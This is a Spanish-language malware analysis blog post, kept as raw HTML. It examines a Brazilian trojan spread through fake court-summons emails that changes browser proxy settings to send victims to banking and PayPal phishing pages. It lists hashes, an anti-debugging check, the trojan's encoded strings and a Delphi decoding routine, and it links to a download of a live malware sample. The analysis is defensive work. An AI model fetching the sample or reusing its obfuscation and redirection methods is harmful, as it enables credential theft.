<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAxIomvY1-paIT23vJbzOZvT14KzGg_ixRipZ1trmyOvKZCOQEjZCPlxdYhB4FP_RrfmiSJI5Rv3wlhwii3OgEyL4giuuz6Kjx4GrsscQZMEMWiS3LndwceczKNYxLfmVnuOKS8oTCT4/s1600/consola.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIAxIomvY1-paIT23vJbzOZvT14KzGg_ixRipZ1trmyOvKZCOQEjZCPlxdYhB4FP_RrfmiSJI5Rv3wlhwii3OgEyL4giuuz6Kjx4GrsscQZMEMWiS3LndwceczKNYxLfmVnuOKS8oTCT4/s1600/consola.png" height="250" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Readme en Ruso del Bot encontrado en el servidor.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN1XetZrMwagTKv3Y1EbdWHJ-u7S1SWKL4ipu7m0vCnXYm3ynKviS8fB7lXFFEpeJvoZmxpMIsjWDEGuhUD4bBk3iVqAla8o_T9tip1vp78-s99PhgfnVqqwRvt-_3X6tf5QtIZiGl-CA/s1600/ruso.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN1XetZrMwagTKv3Y1EbdWHJ-u7S1SWKL4ipu7m0vCnXYm3ynKviS8fB7lXFFEpeJvoZmxpMIsjWDEGuhUD4bBk3iVqAla8o_T9tip1vp78-s99PhgfnVqqwRvt-_3X6tf5QtIZiGl-CA/s1600/ruso.jpg" height="409" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Nota interesante sobre este bot </span><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">-> http://www.webroot.com/blog/2012/02/03/a-peek-inside-the-smoke-malware-loader/</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Muestra:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">https://mega.co.nz/#!9A1z2YpY!360jF2N2FbUFuss5vvNIDS-lX07nugOomLckduSPN7E</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">Eso es todo por el momento.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">@Dkavalanche 2014</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-67682402711756200412014-05-12T08:44:00.000-07:002014-05-12T08:44:55.294-07:00<b style="background-color: #fefdfa;"><span style="color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-small;"><span style="line-height: 18.200000762939453px;">Falsa Intimación de audiencia, Troyano Proxy Changer-</span></span></b><br />
<b style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.200000762939453px;"><br /></b><span style="background-color: #fefdfa; font-size: small;"><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;">Hoy les traigo un troyano de origen Brasileño que al infectar a la victima, este cambia la configuración de red del browser para re dirigirlos a sitios falsos de phishing para captura de credenciales: Hotmail, PayPal, caixaeconomica, citibank, caixa, pagseguro.uol, live, facebook, bancobradesco, etc</span></span></span><br />
<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 18.2px;"><br /></span><span style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: small; line-height: 18.2px;"></span><span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: small; line-height: 18.2px;">Correos falsos enviados a las victimas.</span><br />
<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.200000762939453px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ImcM2PeMHnK-2llSwu6HS_sqehcC1V667X9CZcDzqkZg26tnjuf6rQciaAlHwKUlxUeitEr5N0ohiGKTadQjZzHdjuQUAfP5xCvcD9SGIv8aGJLfWsHqnUL8m_oBxNLmlKB5mrdCGOo/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6ImcM2PeMHnK-2llSwu6HS_sqehcC1V667X9CZcDzqkZg26tnjuf6rQciaAlHwKUlxUeitEr5N0ohiGKTadQjZzHdjuQUAfP5xCvcD9SGIv8aGJLfWsHqnUL8m_oBxNLmlKB5mrdCGOo/s1600/fake.jpg" height="199" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-size: x-small;">https://www.virustotal.com/es/file/69513dae2d9e228285124c91a567b50fcdfec6802d37c505c2f84f4adcfc15bf/analysis/1399642976/</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="pull-right margin-right-1" id="votes-resume" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: right; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-right: 10px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;" url="/es/file/69513dae2d9e228285124c91a567b50fcdfec6802d37c505c2f84f4adcfc15bf/votes-resume/">
</div>
<br />
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<table style="background-color: transparent; border-collapse: collapse; border-spacing: 0px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">SHA256:</span></td><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">69513dae2d9e228285124c91a567b50fcdfec6802d37c505c2f84f4adcfc15bf</span></td></tr>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Nombre:</span></td><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Visualizar_Intimacao140514.exe</span></td></tr>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Detecciones:</span></td><td class="
text-red " style="color: rgb(180, 12, 26) !important; padding: 8px 10px 9px;"><span style="font-size: x-small;">23 / 52</span></td></tr>
<tr><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">Fecha de análisis:</span></td><td style="padding: 8px 10px 9px;"><span style="font-size: x-small;">2014-05-09 13:42:56 UTC ( hace 3 días )</span></td></tr>
</tbody></table>
</div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<b>Rutina antiDebugging </b></div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
IsDebuggerPresent </div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<br /></div>
<div class="span8 columns" style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; float: left; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 20px; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; width: 620px; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguflr_LnhNs9tpkXfTWhREhc2-EVpT5WGhl76jYVmcZUzjEIMDJVycLBImplPAnwqkWKyvX_mRZHQptFRllEqfDUbjHmpTTcAaEulNvnn7anh1nv4JAdB5Pm_CJnogKsxnmTSV8i30vXw/s1600/04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguflr_LnhNs9tpkXfTWhREhc2-EVpT5WGhl76jYVmcZUzjEIMDJVycLBImplPAnwqkWKyvX_mRZHQptFRllEqfDUbjHmpTTcAaEulNvnn7anh1nv4JAdB5Pm_CJnogKsxnmTSV8i30vXw/s1600/04.png" height="228" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Se observan cadenas codificadas.</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">058FD98 <ustring> 'GET'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0059210C <ustring> '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 005924AC <ustring> 'KtbpT6LjKczlT0'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 005924D8 <ustring> 'N45ZT6bsPIvYONG'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592504 <ustring> 'G6LZQ6yWRsPc'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0059252C <ustring> 'ScLdBcLuPI11H4GW8aXBGrLSKszcT7TXScLSJMbZSczpRsPqN5TfRcHlTtDSGtLoScLkT5PbSdDfRsvSIMvqPN9kPNGWKsLqT6bkPtCY82zs845rT6z3RsvcQMTLScmWBsGW9J4WBsO'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592650 <ustring> 'ScLdBcLuPI11H4GW8aXBJ4rSKszcT7TXScLSJMbZSczpRsPqN5DbOtLoQNHv84DbRdHbSY8WBtOWHcboPNTXR6n4QNDXOcnbJczqQMPv82zq8595Hrz4LqzIH20lP20mU30mC30mC30n82zc'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592780 <ustring> 'ScLdBcLuPI11H4GW8aXBJ4rSKszcT7TXScLSJMbZSczpRsPqN5DbOtLoQNHv84DbRdHbSY8WBtOWLN1aONHbSqHfSs5YR6LERtHfPdaWBtGWKaL7NqHNJr9482za831uC30mC30mC34WBsO'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C08 <ustring> '82zZ80'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C24 <ustring> 'KtbpT6LjKczlT0'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C50 <ustring> 'N45ZT6bsPJ8kOc5q80'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592C84 <ustring> 'GL1GH45KGG'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592CA8 <ustring> 'N4rlUcbiR65SHcboPMPlU5nGSczcQMnbSm'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592CFC <ustring> 'N45ZT6bsPJ8kOc5q'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592D2C <ustring> 'OsGWBqGW8YL1K514GLH19LnDRtffR6nXN4PfScLcRtXSK79lPcbiPNCY'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592DAC <ustring> 'OsGWAYvaPMPXTMnq'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592DDC <ustring> 'SsLq86PVOM8z9MDa9G'</ustring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00592E10 <ustring> 'PMDeRo1rSsLoNt1oPMOe8cvbT7TlScikS79lU7akONLqRsDlRcPfPrzrScmYB20Y9J4YAJi+FY8bPbzXOYLSS79bPdCkQdCY'</ustring></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La rutina Decodificadora comienza en 00591FD0 /$ 55 PUSH EBP</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1L47Gt28jvtjuEu6lUUzgYZXBsOmZ5vUKwXTzUicOJKrmUeGrL8vg87uVbtFgXR3FsJCQUCbTGW4jcco-BRh25T3qzgDcoPGaMOJpGVORENyFwDiFY6wWWVMX7G5W8YtJqNKhtoQgJvw/s1600/05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1L47Gt28jvtjuEu6lUUzgYZXBsOmZ5vUKwXTzUicOJKrmUeGrL8vg87uVbtFgXR3FsJCQUCbTGW4jcco-BRh25T3qzgDcoPGaMOJpGVORENyFwDiFY6wWWVMX7G5W8YtJqNKhtoQgJvw/s1600/05.png" height="156" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Poniendo los BP en donde corresponde podemos obtener los strings decodificados en el Stack.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutFL_i10g5xrzbqWsab2CtJYJke618DTeqCWArNzL8wGXQy-3iXhQKM3NbEJ-x9_fXGZurZG0wNskF-nrSm48JjBxUUkk2UScJNSnNxaWEqLiCXJGr5UCRUwa1JP_1136Va9cIZ4YxIc/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutFL_i10g5xrzbqWsab2CtJYJke618DTeqCWArNzL8wGXQy-3iXhQKM3NbEJ-x9_fXGZurZG0wNskF-nrSm48JjBxUUkk2UScJNSnNxaWEqLiCXJGr5UCRUwa1JP_1136Va9cIZ4YxIc/s1600/13.png" height="224" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp9EEEfK1HPPxbxXkJJV6ZyRt8qNGH7t6UWjsk-W-aAP3MjAzIris2eELyrimtrYQ0r9G0Korl5r2NJRdUQ85wGx8kv7QdzliGU1ZIHidVDH10qpmq_BvFfai2RaKY78X7B3FTL5mf3vs/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp9EEEfK1HPPxbxXkJJV6ZyRt8qNGH7t6UWjsk-W-aAP3MjAzIris2eELyrimtrYQ0r9G0Korl5r2NJRdUQ85wGx8kv7QdzliGU1ZIHidVDH10qpmq_BvFfai2RaKY78X7B3FTL5mf3vs/s1600/14.png" height="220" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizTa9p_ydpUw3EITbnEw0bNPAnDVRDIV9IDF_AfOeAmIu9h_ZiCSGJSqH0iNreFgRN12pulbsZg4iXHc-BEY5Uie2KxiJobLZ_vl-Tb67wnfiClcxjIf-BeaDVu5x1HCzrptdBQYQwn3M/s1600/09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizTa9p_ydpUw3EITbnEw0bNPAnDVRDIV9IDF_AfOeAmIu9h_ZiCSGJSqH0iNreFgRN12pulbsZg4iXHc-BEY5Uie2KxiJobLZ_vl-Tb67wnfiClcxjIf-BeaDVu5x1HCzrptdBQYQwn3M/s1600/09.png" height="104" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">La rutina esta basado en encoded en base64 mas un salt.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
http://www.delphipages.com/forum/archive/index.php/t-133728.html</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">const</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Codes64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">function Encode64(S: string): string;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">var</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">i: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := '';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">for i := 1 to Length(s) do</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := Ord(s[i]);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b * 256 + x;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a + 8;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">while a >= 6 do</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a - 6;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := b div (1 shl a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b mod (1 shl a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := Result + Codes64[x + 1];</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if a > 0 then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := b shl (6 - a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := Result + Codes64[x + 1];</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">function Decode64(S: string): string;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">var</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">i: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b: Integer;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := '';</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := 0;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">for i := 1 to Length(s) do</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := Pos(s[i], codes64) - 1;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if x >= 0 then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b * 64 + x;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a + 6;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">if a >= 8 then</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">begin</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">a := a - 8;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := b shr a;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">b := b mod (1 shl a);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">x := x mod 256;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Result := Result + chr(x);</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">else</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Exit;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">end;</span></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br /></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Les dejo mas abajo el decoder en delphi para la descarga.</span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br /></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br /></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #333333;"><span style="line-height: 20px;">El troyano se conecta al siguiente servidor y este le responde con un string codificado que sera la configuración a cambiar en el proxy del navegador.</span></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"><br /></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
